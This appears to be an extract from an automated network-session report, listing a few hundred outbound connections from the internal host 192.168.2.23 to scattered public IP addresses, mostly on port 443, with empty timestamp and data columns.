                                                11044192.168.2.2348364130.51.153.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11045192.168.2.2343818170.39.205.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11046192.168.2.2351060131.118.50.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11047192.168.2.235246291.103.38.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11048192.168.2.2340388197.252.149.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11049192.168.2.2345322217.221.96.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11050192.168.2.2357234174.51.67.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11051192.168.2.235590013.115.68.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11052192.168.2.2350866167.107.4.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11053192.168.2.2343326200.150.110.388080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11054192.168.2.235830252.15.137.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11055192.168.2.2333384130.125.38.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11056192.168.2.235200012.68.159.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11057192.168.2.2345808133.145.49.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11058192.168.2.2352940128.76.168.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11059192.168.2.2354056153.68.100.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11060192.168.2.23369522.40.73.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11061192.168.2.2344328115.222.79.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11062192.168.2.234143020.73.251.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11063192.168.2.2353070192.11.173.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11064192.168.2.23559809.183.232.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11065192.168.2.235623663.65.202.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11066192.168.2.2340148174.224.186.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11067192.168.2.2336886173.248.84.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11068192.168.2.2350358169.4.248.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11069192.168.2.2339222124.36.214.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11070192.168.2.235241664.204.167.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11071192.168.2.2359216162.110.211.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11072192.168.2.234068423.81.91.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11073192.168.2.234647866.215.163.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11074192.168.2.235924446.20.255.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11075192.168.2.234032477.84.43.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11076192.168.2.234464277.66.194.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11077192.168.2.2356872217.95.121.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11078192.168.2.235583843.247.42.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11079192.168.2.2342168166.14.76.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11080192.168.2.2335000157.76.78.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11081192.168.2.2352666195.66.186.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11082192.168.2.2335430175.232.115.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11083192.168.2.2344184209.175.128.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11084192.168.2.23503924.181.97.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11085192.168.2.234140074.240.187.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11086192.168.2.2358232216.200.63.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11087192.168.2.2335598206.232.130.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11088192.168.2.2332854194.232.198.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11089192.168.2.2348330178.3.173.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11090192.168.2.2360358142.172.79.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11091192.168.2.235809254.232.108.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11092192.168.2.2340102170.49.1.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11093192.168.2.235307625.237.155.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11094192.168.2.233347071.95.107.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11095192.168.2.234455868.210.246.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11096192.168.2.2339066154.234.155.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11097192.168.2.2347032163.34.86.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11098192.168.2.235586069.173.10.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11099192.168.2.2344612107.53.250.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11100192.168.2.234391425.169.49.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11101192.168.2.2356046211.238.253.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11102192.168.2.236092418.81.66.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11103192.168.2.2351704223.103.87.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11104192.168.2.235845614.55.25.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11105192.168.2.2344350154.156.52.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11106192.168.2.2349998191.2.254.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11107192.168.2.234974013.44.116.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11108192.168.2.234029442.4.234.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11109192.168.2.2347798133.106.182.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11110192.168.2.2350672114.208.116.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11111192.168.2.2333134185.230.146.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11112192.168.2.2356838125.229.149.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11113192.168.2.2359938164.233.36.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11114192.168.2.2333990146.28.119.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11115192.168.2.2351708176.79.36.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11116192.168.2.2353520119.108.141.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11117192.168.2.2333890180.11.180.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11118192.168.2.2343568222.8.115.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11119192.168.2.235263654.237.42.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11120192.168.2.234557063.197.139.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11121192.168.2.235431651.107.221.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11122192.168.2.2335018190.50.101.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11123192.168.2.2338762180.189.15.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11124192.168.2.2336628131.242.57.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11125192.168.2.235938847.63.159.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11126192.168.2.2354688165.68.70.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11127192.168.2.2353518194.203.76.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11128192.168.2.2347286121.46.12.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11129192.168.2.2354160190.30.102.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11130192.168.2.235281624.83.19.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11131192.168.2.2351412216.5.70.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11132192.168.2.2346284149.23.226.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11133192.168.2.2340074206.97.210.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11134192.168.2.234561031.215.10.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11135192.168.2.235694063.181.228.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11136192.168.2.233609685.148.123.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11137192.168.2.2350678198.101.96.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11138192.168.2.2335318200.84.133.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11139192.168.2.234044686.252.246.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11140192.168.2.233780470.41.148.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11141192.168.2.2349118151.207.40.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11142192.168.2.235294878.70.215.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11143192.168.2.235814883.23.197.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11144192.168.2.234756684.34.243.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11145192.168.2.2360418116.246.131.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11146192.168.2.235851242.192.5.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11147192.168.2.234273425.78.11.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11148192.168.2.234886482.219.242.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11149192.168.2.2345302163.209.198.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11150192.168.2.2349868142.18.19.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11151192.168.2.233299238.234.132.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11152192.168.2.2351306180.23.155.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11153192.168.2.2338050149.77.52.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11154192.168.2.233740660.99.147.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11155192.168.2.2349356176.143.41.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11156192.168.2.2345582106.16.14.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11157192.168.2.2340378156.233.243.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11158192.168.2.235295847.28.160.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11159192.168.2.2337864102.74.26.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11160192.168.2.2359680149.216.3.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11161192.168.2.2348416128.250.2.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11162192.168.2.233596852.37.106.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11163192.168.2.2334280177.160.14.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11164192.168.2.235942483.234.34.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11165192.168.2.2342278161.221.108.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11166192.168.2.235627870.33.169.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11167192.168.2.234556042.135.26.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11168192.168.2.234443492.176.190.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11169192.168.2.235202664.114.190.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11170192.168.2.235196066.122.202.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11171192.168.2.2334912154.124.25.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11172192.168.2.2348276188.101.209.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11173192.168.2.2354210212.244.113.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11174192.168.2.234482432.115.62.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11175192.168.2.235376858.5.135.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11176192.168.2.2335432132.36.170.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11177192.168.2.2333734102.112.112.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11178192.168.2.2345122186.181.39.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11179192.168.2.235575464.75.119.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11180192.168.2.2353732112.160.123.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11181192.168.2.2334288151.6.63.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11182192.168.2.2347556115.2.138.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11183192.168.2.233457297.35.84.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11184192.168.2.2339480190.217.129.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11185192.168.2.2334054180.82.30.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11186192.168.2.2333352118.79.251.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11187192.168.2.23460624.208.144.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11188192.168.2.2347848138.118.172.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11189192.168.2.2332788191.130.225.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11190192.168.2.235068234.65.191.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11191192.168.2.234785253.136.84.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192192.168.2.2336260110.64.203.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11193192.168.2.2357644102.238.145.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11194192.168.2.2339312122.51.62.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11195192.168.2.2356868173.121.125.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11196192.168.2.2343912146.167.18.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11197192.168.2.233568445.26.126.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11198192.168.2.233643277.226.29.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11199192.168.2.235483083.19.69.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11200192.168.2.234542420.106.161.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11201192.168.2.23519648.143.77.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11202192.168.2.2353344111.116.100.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11203192.168.2.233890871.87.118.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11204192.168.2.23413801.26.239.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11205192.168.2.2334420184.154.162.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11206192.168.2.235268424.241.196.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11207192.168.2.2353956201.241.85.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11208192.168.2.2355120158.143.157.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11209192.168.2.2336068155.38.101.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11210192.168.2.2354874111.186.254.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11211192.168.2.235085225.6.157.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11212192.168.2.2343362176.98.108.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11213192.168.2.233454847.147.139.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11214192.168.2.234642063.159.134.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11215192.168.2.2356840142.153.134.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11216192.168.2.2355096177.174.3.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11217192.168.2.233793248.216.15.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11218192.168.2.2357488164.62.43.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11219192.168.2.2360624185.224.66.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11220192.168.2.2347180142.191.42.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11221192.168.2.2354552156.122.225.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11222192.168.2.235317432.13.228.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11223192.168.2.2352398109.92.150.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11224192.168.2.2336604208.118.15.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11225192.168.2.2335132199.92.47.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11226192.168.2.234552268.68.192.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11227192.168.2.2353314212.89.184.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11228192.168.2.235436878.205.184.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11229192.168.2.233809086.164.45.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11230192.168.2.233976659.21.8.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11231192.168.2.2346610198.0.157.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11232192.168.2.2335784174.222.145.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11233192.168.2.2337818198.75.189.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11234192.168.2.2339214219.108.221.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11235192.168.2.2357642100.61.100.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11236192.168.2.2350180142.115.207.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11237192.168.2.2333696182.3.76.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11238192.168.2.233292674.20.157.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11239192.168.2.234406258.91.1.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11240192.168.2.2356798182.182.5.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11241192.168.2.2336440113.222.170.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11242192.168.2.236056414.42.142.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11243192.168.2.2341368218.45.35.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11244192.168.2.2355798201.239.220.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11245192.168.2.23584645.98.76.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11246192.168.2.2347712169.192.26.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11247192.168.2.234071440.240.3.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11248192.168.2.2337678183.198.113.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11249192.168.2.2346890104.117.238.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11250192.168.2.233893834.252.239.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11251192.168.2.2342800152.57.66.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11252192.168.2.234449070.104.239.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11253192.168.2.235932672.24.43.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11254192.168.2.235249034.60.113.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11255192.168.2.2342174139.92.219.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11256192.168.2.235086834.150.17.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11257192.168.2.2354952148.79.244.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11258192.168.2.2343608189.189.244.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11259192.168.2.234255049.94.22.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11260192.168.2.2356096222.19.80.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11261192.168.2.2348582118.32.57.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11262192.168.2.233871042.0.126.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11263192.168.2.2347352207.115.139.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11264192.168.2.2337920139.11.87.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11265192.168.2.234484284.143.245.42443
                                                TimestampBytes transferredDirectionData


